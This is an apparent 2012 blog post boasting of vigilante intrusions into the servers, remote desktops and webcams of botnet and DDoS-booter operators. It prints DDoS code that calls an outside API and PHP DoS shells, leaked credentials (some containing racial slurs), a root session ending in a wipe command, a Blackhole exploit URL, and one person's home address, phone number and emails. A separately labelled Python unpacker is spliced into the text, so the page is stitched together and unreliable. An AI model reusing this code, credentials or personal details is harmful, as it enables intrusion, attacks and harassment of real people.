Thursday, December 13, 2012

Nyx Stresser


http://www.hackforums.net/showthread.php?tid=2899035

One of many shitty "booters". Took it down just now.



I'm not going to release the source because that would simply encourage skids to copy and paste it and make their own. Here's the core DoS logic though, from "hub.php":

@file_get_contents("http://atomicapi.net/send.php?key={$keyBoot}&host={$host}&port={$port}&time={$time}");

$select = mysql_query("SELECT * FROM shells WHERE status = 'up'");
//shells = "http://95.211.186.68/sudp.php", "http://178.18.19.122/sno.php"

while ($item = mysql_fetch_array($select)) {
    $ch = curl_init($item['url']."?act=phptools&type=".$type."&host=".$host."&time=".$time."&port=".$port);
}
So it uses the "atomic API" DDoS service plus two PHP DoS shells on cheap VPSs rented by the owner. Very sophisticated.

Here's the user table from the database. All password hashes are unsalted md5. Some already cracked. For the ones that I was too lazy to crack, try Googling the hash and you'll have a decent success rate.

Account Dump:
http://pastebay.net/1173575

Saturday, December 8, 2012

Nick Moses, botnet master

Daily / Nick Moses is at it again.


Ran the uninstall command for a good few hours.

It reached about 250 executions.
He logged in and noticed, removed it, and changed all his passwords.

Ran the command again; he noticed once more. This time he changed the database password, fucking up his own Blackshades panel for quite a few hours before he realized what he did.

Nick Moses, intrusion prevention expert

Finally I got in a third time and made a small modification to Blackshades' command processing file that would silently run the uninstall command. That took out the rest of his Blackshades bots. Over the course of the week about 1300 bots were uninstalled.

Blackshades panel credentials:
micknoses:Nigger123:67.189.249.252
apoc:copa:74.36.162.180
define('DB_SERVER', "localhost");
define('DB_USER', "root");
define('DB_PASS', "Nigger123");
define('DB_DATABASE', "niggers");
$CFG_PASSWORD = "Nigger123";
daily500:nigger123456@pool.bitclockers.com:8332 //Bitcoin pool credentials for his bots
Top notch security.


He also had the same password stealer as last time ("Pieces of Eight"). Wiped about 8000 password captures.

Here was some of the shit on his server:
$ ssh root@daily-apoc.com
root@daily-apoc.com's password: 
[root@Daily-Apoc ~]# ls -al
total 153340
drwxr-x---  3 root root     4096 Dec  1 19:53 .
drwxr-xr-x 20 root  500     4096 Dec  1 15:25 ..
-rw-------  1 root root      728 Dec  1 19:53 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-rw-r--r--  1 root root 84733045 Sep 30 20:31 xampp-linux-1.8.1.tar.gz
-rw-r--r--  1 root root 39143077 Sep 30 20:31 xampp-linux-devel-1.8.1.tar.gz
-rw-r--r--  1 root root 33103312 Sep 30 20:31 xampp-linux-upgrade-1.8.0-1.8.1.tar.gz
drwxr-xr-x  3 root root     4096 Sep 30 12:52 xampp-upgrade
[root@Daily-Apoc ~]# last -ai
root     pts/1        Sun Dec  2 13:15 - 16:27  (03:11)     67.189.249.252
root     pts/0        Sat Dec  1 15:34 - 19:53  (04:18)     174.127.99.221
reboot   system boot  Sat Dec  1 15:25          (13:57)     0.0.0.0
root     pts/1        Sun Apr  5 19:36 - 19:36  (00:00)     81.152.164.227
root     pts/0        Sun Apr  5 19:28 - down   (00:07)     81.152.164.227
reboot   system boot  Sun Apr  5 19:28          (00:07)     0.0.0.0
root     pts/0        Sun Apr  5 19:24 - down   (00:02)     81.152.164.227
reboot   system boot  Sun Apr  5 19:24          (00:02)     0.0.0.0

wtmp begins Sun Apr  5 19:23:49 2009
[root@Daily-Apoc ~]# ls -al /opt/lampp/htdocs/installation/ /opt/lampp/htdocs/update/
/opt/lampp/htdocs/installation/:
total 172
drwxr-xr-x 9 root   root  4096 Dec  1 16:45 .
drwxr-xr-x 6 nobody root  4096 Dec  2 00:49 ..
-rw-r--r-- 1 root   root  2000 Mar  2  2011 alive.php
-rw-r--r-- 1 root   root 10602 Mar  4  2011 bots.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:42 classes
-rw-r--r-- 1 root   root 14907 Mar  4  2011 cmd.php
-rw-r--r-- 1 root   root   522 Dec  1 16:40 config.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:42 db
-rw-r--r-- 1 root   root 12425 Mar  2  2011 dos.php
-rw-r--r-- 1 root   root  2502 Feb 28  2011 fg.php
-rw-r--r-- 1 root   root   978 Jan 14  2011 header.php
drwxr-xr-x 4 root   root  4096 Dec  1 16:44 img
-rw-r--r-- 1 root   root  2314 Jan 27  2011 index.php
-rw-r--r-- 1 root   root 12381 Mar  4  2011 install.php
-rw-r--r-- 1 root   root  1279 Dec 31  2010 logout.php
-rw-r--r-- 1 root   root  9018 Mar  4  2011 logs.php
-rw-r--r-- 1 root   root  6541 Mar  2  2011 main.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:34 pieces
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 plugins
-rw-r--r-- 1 root   root  9185 Feb 28  2011 pws.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 screens
-rw-r--r-- 1 root   root  1127 Mar  2  2011 scr.php
-rw-r--r-- 1 root   root  7746 Jan 26  2011 settings.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 webcam
-rw-r--r-- 1 root   root  6831 Mar  2  2011 webc.php

/opt/lampp/htdocs/update/: // CVE-2012-4681 Java driveby
total 28
drwxr-xr-x 3 root   root 4096 Dec  2 01:04 .
drwxr-xr-x 6 nobody root 4096 Dec  2 00:49 ..
-rw-r--r-- 1 root   root  915 Dec  1 21:34 Certificate.crt
drwxr-xr-x 2 root   root 4096 Dec  2 01:06 download
-rw-r--r-- 1 root   root  782 Dec  2 00:49 index.php
-rw-r--r-- 1 root   root  782 Dec  2 00:49 install.php
-rw-r--r-- 1 root   root 3150 Dec  1 21:34 java.jar

// Blackhole iframe injector, deobfuscated URL is hxxp://blackhole.twilightparadox.com/analytics/except/turn-engineer_charges_got.php

[root@Daily-Apoc ~]# cat /opt/lampp/htdocs/videos/index.php
<script>//long obfuscated code</script>

// and finally
[root@Daily-Apoc ~]# rm -rf /*


He also recently managed to independently become infected with some malware himself, causing a bit of public embarrassment on a popular malware forum: http://trojanforge.com/showthread.php?t=1425

lol
He wasn't too happy about this turn of events.




Sunday, December 2, 2012

"Suit"

For the first time, we have a "developer" here on the skid list. Indeed, a professional programmer of great prowess and ingenuity.

He goes by the name "Suit" (also "saywh4t" and others) on skidforums: http://www.hackforums.net/member.php?action=profile&uid=438020

At first glance, he appears to be a typical "bot herder," trojan spreader, and password thief. Dime a dozen.

Bot exchanging service

lol


What makes him stand out, though, are his endeavoring malware development projects:

Shitty advertisement


Another shitty advertisement


Truly revolutionizing the field of skidware. Do his claims hold any water, though? What gives his "products" a competitive edge?

Suit, otherwise known as Reece Chambers, did all of his development for s00tbot with webhosting from xhostfire.com, a now-defunct web hosting service for skids.

I gently slipped a shell into his website's sandy beach and listened to its soft murmurs.

$ uname -a
Linux usa.xhostfire.com 2.6.18-274.18.1.el5.028stab098.1 #1 SMP Sat Feb 11 15:30:41 MSK 2012 i686 i686 i386 GNU/Linux
$ last -i
cunningp pts/0        130.216.30.121   Thu May 17 14:25 - 14:25  (00:00)
root     pts/0        70.95.123.70     Mon Apr 30 06:46 - down   (00:00)
sunnyval pts/0        174.56.103.168   Sun Apr  8 15:52 - 15:52  (00:00)
hackal   pts/0        46.99.251.19     Sun Apr  1 08:16 - 08:16  (00:00)
albini   pts/0        46.99.251.19     Sun Apr  1 08:15 - 08:15  (00:00)
socialen pts/0        96.44.101.216    Sat Mar 31 15:14 - 15:14  (00:00)
root     pts/0        85.76.123.168    Mon Mar 26 07:09 - down   (01:42)

$ ls -al ~/public_html/*

/home/cunningp/public_html/Website:
total 5672
drwxr-xr-x  7 cunningp cunningp    4096 May 23 02:43 .
drwxr-xr-x 12 cunningp nobody      4096 May 30 06:32 ..
-rw-r--r--  1 cunningp cunningp     220 Apr 25 17:42 .wysiwygPro_preview_339a5242a75565fc8cdd28b92e3ac846.php
drwxr-xr-x  2 cunningp cunningp    4096 May  2 22:34 Images
-rw-r--r--  1 cunningp cunningp 1419623 Apr 30 20:29 SecurityPanel(no_Install).zip
-rw-r--r--  1 cunningp cunningp 1406284 Apr 29 23:14 SecurityPanel.zip
drwxr-xr-x  2 cunningp cunningp    4096 Apr 17 18:43 SpryAssets
drwxr-xr-x  2 cunningp cunningp    4096 Apr 17 17:45 Templates
-rw-r--r--  1 cunningp cunningp    7741 May  3 22:01 about.php
-rw-r--r--  1 cunningp cunningp    2872 Apr 17 17:59 clients.html
-rw-r--r--  1 cunningp cunningp     923 Apr 26 23:04 clients.php
-rw-r--r--  1 cunningp cunningp    1682 May  1 21:02 config.php
-rw-r--r--  1 cunningp cunningp 2849380 May 30 16:39 error_log
-rw-r--r--  1 cunningp cunningp       0 May  1 20:48 gate.php
-rw-r--r--  1 cunningp cunningp     871 May  1 21:06 gatev2.php
-rw-r--r--  1 cunningp cunningp    1266 May  1 02:42 hidetest.php
drwxr-xr-x  2 cunningp cunningp    4096 May  4 08:08 include
-rw-r--r--  1 cunningp cunningp    2748 May  2 20:42 newClient.php
-rw-r--r--  1 cunningp cunningp    4137 May  2 21:43 newCommand.php
-rw-r--r--  1 cunningp cunningp    3274 May  2 20:32 newStat.php
-rw-r--r--  1 cunningp cunningp    2262 May  3 03:55 query.php
drwxr-xr-x  3 cunningp cunningp    4096 Apr 17 15:58 source
-rw-r--r--  1 cunningp cunningp    2133 Apr 23 01:37 statistics.html
-rw-r--r--  1 cunningp cunningp     751 Apr 25 20:38 stats.php
-rw-r--r--  1 cunningp cunningp    2459 Apr 27 02:55 style(original).css
-rw-r--r--  1 cunningp cunningp    4115 May  3 18:13 style.css
-rw-r--r--  1 cunningp cunningp    5372 May  2 19:28 test.php
-rw-r--r--  1 cunningp cunningp    2629 Apr 30 02:30 test2.php

[etc...]

$ ls -al /root              // root home dir is 777, lol
total 19416
-rw-r--r--  1 root root    10113 Mar  5 12:27       1
drwxrwxrwx 21 root root     4096 May 30 08:33 .
drwxr-xr-x 22 root root     4096 May 30 09:15 ..
-rw-------  1 root root      318 Apr 30 06:46 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
[snip]
drwxr-xr-x  2 root root     4096 Mar 24 20:14 gott4
-rw-r--r--  1 root root    26065 Jan 29 02:20 gott4.zip
-rw-r--r--  1 root root    36358 Mar 24 20:04 index.html
-rw-r--r--  1 root root    30580 Mar 24 20:04 index.html?h=96f62342bc4f8f81944d259b6e0c153e&t=1332579809&f=92c4469c
-rwx------  1 root root     1067 Jan 10  2006 install.sh
-rw-r--r--  1 root root     1067 Jan 10  2006 install.sh.1
-rw-r--r--  1 root root     1067 Jan 10  2006 install.sh.2
drwxr-xr-x  2 root root     4096 Jan 17 18:25 public_ftp
drwxr-xr-x  3 root root     4096 Jan 17 18:25 public_html
-rw-r--r--  1 root root    12027 Mar 24 20:11 slow.pl
-rw-r--r--  1 root root     1286 Mar 24 20:06 syn.pl
drwxr-xr-x  3 root root     4096 May 30 02:41 tmp
-rwx------  1 root root      443 Jan 10  2006 uninstall.ddos
-rw-r--r--  1 root root      443 Jan 10  2006 uninstall.ddos.1
-rw-r--r--  1 root root      443 Jan 10  2006 uninstall.ddos.2



Here's some of his botnet panel code; his comments prefaced with "//", mine with "/*".

$hwid = ($_POST['hwid']);  //Collects hwid
...
$pc = ($_POST['pc']);    //Collects pc name
/* what ever would I do without those helpful comments */
$query = "INSERT INTO `".$sqlSettings['tableVisitorsList']."`";
$query .= "VALUES('', '$ipAddress', '$hwid', '$pc', '$os', '$status', '$country', '$mode', '', '$tStamp', '$tStamp', '', '')";
/* this looks perfectly safe */

He also made his own proprietary PHP "obfuscator" for distributing the source, which sadly enough I'm sure will still stop most script babbies.

function kEFFEX($NmkVE)
{
    $NmkVE = gzinflate(base64_decode($NmkVE));
    for ($i = 0; $i < strlen($NmkVE); $i++)
    {
        $NmkVE[$i] = chr(ord($NmkVE[$i]) - 1); /* this ain't your father's gzinflate base64decode...he subtracts 1 and renames some variables too! */
    }
    return $NmkVE;
}
eval(kEFFEX('longfuckingstring'));
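An added example, not code from the post or from Suit's source: a Python unpacker that reverses the kEFFEX() scheme statically (base64, raw DEFLATE, subtract 1 per byte) so an analyst can read the payload without ever eval()ing it. The packer side (keffex_encode) is assumed to mirror the decoder and exists only to build the constructed sample; the regex matching eval(anyname('...')) is likewise an assumption about how the renamed wrapper appears.

```python
import base64
import re
import zlib

# Reverse of the quoted kEFFEX(): base64-decode, inflate a raw DEFLATE stream
# (what PHP's gzinflate() expects), then subtract 1 from every byte. The & 0xFF
# mirrors PHP's chr(), which wraps negative values (chr(-1) == "\xFF").
def keffex_decode(blob):
    raw = zlib.decompress(base64.b64decode(blob), wbits=-15)
    return bytes((b - 1) & 0xFF for b in raw)

# Assumed inverse transform (the real packer is not on the page); used only to
# construct the sample below.
def keffex_encode(plain):
    shifted = bytes((b + 1) & 0xFF for b in plain)
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw deflate, like gzdeflate()
    return base64.b64encode(comp.compress(shifted) + comp.flush()).decode("ascii")

# The decoder function is renamed per build, so match any identifier around the
# base64 literal rather than the name kEFFEX itself.
EVAL_RE = re.compile(r"eval\(\s*(\w+)\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*;?")

def unpack_php(src, max_layers=10):
    """Replace each eval(decoder('...')) with its decoded body, repeating because
    packed samples are often wrapped several times. Returns (source, layers)."""
    layers = 0
    for _ in range(max_layers):
        m = EVAL_RE.search(src)
        if not m:
            break
        decoded = keffex_decode(m.group(2)).decode("latin-1")  # keep bytes 1:1
        src = src[:m.start()] + decoded + src[m.end():]
        layers += 1
    return src, layers

# Constructed sample: a two-layer packed stub built with keffex_encode() above.
INNER = "echo 'hello';"
LAYER1 = "eval(kEFFEX('" + keffex_encode(INNER.encode()) + "'));"
SAMPLE = ("<?php function kEFFEX($x){/* ... */} "
          "eval(kEFFEX('" + keffex_encode(LAYER1.encode()) + "'));")

if __name__ == "__main__":
    unpacked, n = unpack_php(SAMPLE)
    print(n, "layers removed:", unpacked)
```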

The binary itself is some shitty generic C#. Really making waves. Yawn.


Anyway, next I moved onto his Dropbox.

He put a very frightening legal notice inside his Dropbox folder:

DROPBOX EMPLOYEE'S PLEASE NOTE: All items in this folder are protected by the Digital Millennium Copyright Act,
Scanning, Decompiling, Executing, or Submitting these files to any entity without the expressed permission of Myself
is ILLEGAL and a VIOLATION of the DMCA laws and If you violate these laws we will contact our lawyers

I immediately stopped surveying the contents of the folder and DBAN'd my drive to avoid the risk of a lawsuit.

Since he foiled my plans to look at his Dropbox, I was about ready to throw my arms in the air and give up.

However, I got to thinking. His Dropbox was off-limits, but why not just remote into his desktop? I didn't see any mention of that in the DMCA warning. A loophole!

So I did, just to take a peek.

Just snapped a few brief shots. I certainly did not want to intrude!


Reece viewing his own botnet panel
Chatting with friends
Presumably transferring malware to another computer of his



I wanted to get a more personal look at Mr. Chambers. So much more can be conveyed in person than through cold, drab internet posts.

So, I sent an electromagnetic pulse to his webcam's lens and peered through it.

Hey, I can barely see you!
That's better.

So there are my observations of his programming abilities and top notch security safeguards.

Finally, here's a bit of info about Reece. All previously mentioned files, including his website and more goodies, are located at the bottom.

Suit/Hyphee/saywh4t (Reece Chambers)
http://www.hackforums.net/member.php?action=profile&uid=438020

Reece Chambers
10 Ngataringa Rd.
Devonport, Auckland
0624
New Zealand
Phone: 09-445 4496

Emails:

hyphee@windowslive.com (MSN)
saywh4t@gmail.com
subjective.suit@gmail.com
hyphee@gmail.com
r.hyphee@gmail.com

Facebook: http://www.facebook.com/reece.chambers.58
Stalker Facebook: http://www.facebook.com/profile.php?id=100002535412838
"crackhackforum" account: http://www.crackhackforum.com/user-26879.html
Skype: rsnoopyc

Usernames:

Suit
Hyphee
TheRealHyphee
saywh4t

Aliases:

George Tubby
George Phuey

Domains:

cunningpanda.com
xhpel.co.cc
youlaugh.co.cc
lots more

Files: http://www.mediafire.com/?zh65o6rc6ge6gz9
(may be flagged by AV due to his malware binaries)


A lot more blog updates coming soon.
Spread the word